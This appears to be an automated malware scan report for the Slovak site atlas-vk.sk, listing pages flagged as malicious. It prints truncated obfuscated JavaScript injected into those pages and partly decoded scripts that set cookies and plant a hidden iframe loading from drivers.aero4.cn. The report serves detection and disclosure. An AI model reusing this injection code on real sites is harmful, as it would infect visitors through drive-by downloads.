Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=atlas-vk.sk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.atlas-vk.sk/ | 200 OK Content-Length: 10638 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20BS%28BZ%29%7Breturn%20BZ%7Dfunction%20AS%28UN%29%7Breturn%20String.fromCharCode%28UN%29%7Dfunction%20Mr%28RZ%2CEB%2CHt%29%7Breturn%20RZ.substr%28EB%2CHt%29%7Dtry%7Bvar%20FC%3D%27KK0Ke0KX0K60K80Kr0KC0KR0K90Kn0K30KW0KD0Kx0Kq0KL0Km0KF0K70Kh0KU0KV0KB0Kc0Ka0Kd0KM0KP0KT0KS0Kz0Ky0Kg0KY0K40Ki0KZ0KG0Kw0Kk0Kl0Kj0Ko0K50KN0Ks0Kb0Kt0KA0KO0KI0Kf0Kp0KH0eK0ee0eX0e60e80er0eC0eR0e90en0e30eW0eD0ex0eq0eL0em0eF0e70eh0eU0eV0eB%27%3Bvar%20Pa%3DBS%28%2 Antivirus reports:
| ||
http://www.atlas-vk.sk/index.htm | 200 OK Content-Length: 10638 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20BS%28BZ%29%7Breturn%20BZ%7Dfunction%20AS%28UN%29%7Breturn%20String.fromCharCode%28UN%29%7Dfunction%20Mr%28RZ%2CEB%2CHt%29%7Breturn%20RZ.substr%28EB%2CHt%29%7Dtry%7Bvar%20FC%3D%27KK0Ke0KX0K60K80Kr0KC0KR0K90Kn0K30KW0KD0Kx0Kq0KL0Km0KF0K70Kh0KU0KV0KB0Kc0Ka0Kd0KM0KP0KT0KS0Kz0Ky0Kg0KY0K40Ki0KZ0KG0Kw0Kk0Kl0Kj0Ko0K50KN0Ks0Kb0Kt0KA0KO0KI0Kf0Kp0KH0eK0ee0eX0e60e80er0eC0eR0e90en0e30eW0eD0ex0eq0eL0em0eF0e70eh0eU0eV0eB%27%3Bvar%20Pa%3DBS%28%2 Antivirus reports:
| ||
http://www.atlas-vk.sk/index_anj.htm | 200 OK Content-Length: 10029 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20CF%28Rg%29%7Breturn%20Rg%7Dfunction%20SMh%28DvN%29%7Breturn%20String.fromCharCode%28DvN%29%7Dfunction%20RCU%28SKI%2CfiJ%2Ccie%29%7Breturn%20SKI.substr%28fiJ%2Ccie%29%7Dtry%7Bvar%20ho%3D%27MMuMPuMGuM8uMOuM3uMLuMSuM5uMzuMCuMruMhuMTuMnuMDuMXuMNuMouMauMcuMiuMguMBuMZuMUuMfuM9uMkuMluMwuMFuMRuMJuMmuMpuMIuMxuMHuMeuMduMbuMtuMVuMyuMjuMYuM6uMsuMAuMKuM4uMWuMquPMuPPuPGuP8uPOuP3uPLuPSuP5uPzuPCuPruPhuPTuPnuPDuPXuPNuPouPauPcuPiuPg%27%2Ciu%3DCF% Antivirus reports:
| ||
http://www.atlas-vk.sk/construct.htm | 200 OK Content-Length: 6179 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20fC%28mo%29%7Breturn%20mo%7Dfunction%20nd%28oB%29%7Breturn%20String.fromCharCode%28oB%29%7Dfunction%20FM%28WL%2CNk%2CUk%29%7Breturn%20WL.substr%28Nk%2CUk%29%7Dtry%7Bfunction%20tjl%28vfo%29%7Breturn%20parseInt%28vfo%29%7Dvar%20niW%3D%27LL2LR2LX2LU2LN2Li2Lq2Lg2LV2LS2Lp2Lj2L92LK2Lt2Ll2Lf2Lx2Lo2Lz2LI2L42Lh2L52LY2LG2LZ2Lm2Le2LB2L82LJ2Lr2LT2L62Lw2Ly2Ln2LH2LM2LD2LP2Ls2Lc2LO2LC2LW2La2LA2L32LF2Lk2Lb2Ld2RL2RR2RX2RU2RN2Ri2Rq2Rg2RV2RS2Rp2Rj2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : '4arvd', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s = "<ifram for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : '4arvd', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); Antivirus reports:
| ||
http://www.atlas-vk.sk/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.atlas-vk.sk/konstrukcia.htm | 200 OK Content-Length: 6452 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20TG%28TS%29%7Breturn%20TS%7Dfunction%20wT%28ta%29%7Breturn%20String.fromCharCode%28ta%29%7Dfunction%20cg%28vL%2CiK%2CAn%29%7Breturn%20vL.substr%28iK%2CAn%29%7Dtry%7Bvar%20Sgt%3D%27XXEXaEX3EXKEXoEXDEXJEXZEXiEXPEXCEXyEXxEXcEXjEXdEXkEXhEXTEX7EXSEXsEX5EXREXIEXUEXnEXlEXFEXAEXeEXfEXLEXMEXBEXwEXOEX6EX9EXqEXtEXzEXrEXNEXgEX4EXmEXHEXbEXYEXWEX8EXVEXpEaXEaaEa3EaKEaoEaDEaJEaZEaiEaPEaCEayEaxEacEajEadEakEahEaTEa7EaSEasEa5%27%3Bvar%20MVK%3DTG%28 Antivirus reports:
| ||
http://www.atlas-vk.sk/kontakt.htm | 200 OK Content-Length: 10825 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20Tc%28sH%29%7Breturn%20sH%7Dfunction%20pQ%28Tu%29%7Breturn%20String.fromCharCode%28Tu%29%7Dfunction%20zA%28IG%2CgN%2CRY%29%7Breturn%20IG.substr%28gN%2CRY%29%7Dtry%7Bvar%20EF%3D%27KK1Kl1KN1Ka1K81Kj1KT1KG1Kf1KR1Kz1KM1K31KP1Ki1KX1KH1Kb1KL1K91KS1K51KJ1KW1KZ1Kh1KY1Kk1Kx1K41Kn1KI1Kd1KD1Kw1KV1Ky1Ke1KA1KU1K61KF1KO1KC1Ko1Kt1Kq1Kp1Kg1Kc1KB1K71Ks1Km1lK1ll1lN1la1l81lj1lT1lG1lf1lR1lz1lM1l31lP1li1lX1lH1lb1lL1l91lS1l51lJ%27%3Bvar%20Mh%3DEF.subs Antivirus reports:
| ||
http://www.atlas-vk.sk/ubytovanie.htm | 200 OK Content-Length: 8652 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20hf%28cq%29%7Breturn%20cq%7Dfunction%20HF%28qN%29%7Breturn%20String.fromCharCode%28qN%29%7Dfunction%20vE%28OU%2CLV%2CWA%29%7Breturn%20OU.substr%28LV%2CWA%29%7Dtry%7Bfunction%20ap%28EB%29%7Breturn%20parseInt%28EB%29%7Dvar%20CY%3D%27zzEzCEzmEzUEzIEzVEzlEzfEzoEzgEzGEzdEzMEzREzwEziEzAEzHEz9Ez7EznEzrEzpEz5EzYEzJEz4EzkEzxEz3EzaEzPEzLEzFEzhEzXEzyEzKEztEzeEz8EzsEzBEzDEzbEzcEzqEzZEzjEzSEz6EzNEzOEzWECzECCECmECUECIECVEClECfECoECgECGECdECMEC Decoded script: function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : 'rvd4a', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s = "<ifram for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : 'rvd4a', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); Antivirus reports:
| ||
http://www.atlas-vk.sk/restauracia.htm | 200 OK Content-Length: 10799 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20AH%28dM%29%7Breturn%20dM%7Dfunction%20XH%28yi%29%7Breturn%20String.fromCharCode%28yi%29%7Dfunction%20xB%28Dy%2CPj%2CLw%29%7Breturn%20Dy.substr%28Pj%2CLw%29%7Dtry%7Bfunction%20dCt%28zuT%29%7Breturn%20parseInt%28zuT%29%7Dvar%20TGz%3D%27hhuhFuhduhVuhxuhYuhwuhPuhGuhMuhquhruhbuhpuheuhDuh8uhXuh3uhZuhauhguhRuhJuhIuhzuhiuhSuh7uhWuh6uhNuhCuhLuhkuhOuhmuhBuhAuhcuh4uhfuhyuhsuhnuhluhtuh5uhouhHuh9uhjuhTuhKuFhuFFuFduFVuFxuFYuFwuFPuFGuFMuFquFru Decoded script: function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : 'd4avr', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s = "<ifram for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : 'd4avr', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); Antivirus reports:
| ||
http://www.atlas-vk.sk/tipy.htm | 200 OK Content-Length: 9230 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28qA%21%3D1%29%7Bfunction%20XO%28Kr%29%7Breturn%20Kr%7Dfunction%20gSP%28jTq%29%7Breturn%20String.fromCharCode%28jTq%29%7Dfunction%20dCQ%28xSv%2CWVI%2CiFB%29%7Breturn%20xSv.substr%28WVI%2CiFB%29%7Dtry%7Bfunction%20byt%28tmr%29%7Breturn%20parseInt%28tmr%29%7Dvar%20VeU%3D%27SS0Ss0S90Sk0Si0SN0SG0S80S30Sq0SZ0SK0S40SI0SC0SY0Sr0SV0SM0SO0S60SX0Sw0Sg0SR0Sj0Sl0SL0ST0Sb0SA0Se0Sf0Sc0SJ0SH0Sd0St0SB0S50Sp0Sa0Sx0SP0Sm0Sn0So0Sz0SF0Sy0SU0S70SD0SW0sS0ss0s90sk0si0sN0sG0s80s3 Decoded script: function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : 'radv4', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s = "<ifram for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'drivers.aero4.cn', path : '/x86/', cookieName : 'radv4', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: atlas-vk.sk
Result:
GET / HTTP/1.1
Host: atlas-vk.sk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: atlas-vk.sk
Referer: http://www.google.com/search?q=atlas-vk.sk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: atlas-vk.sk
Referer: http://www.google.com/search?q=atlas-vk.sk
Result:
The result is similar to the first query. There are no suspicious redirects found.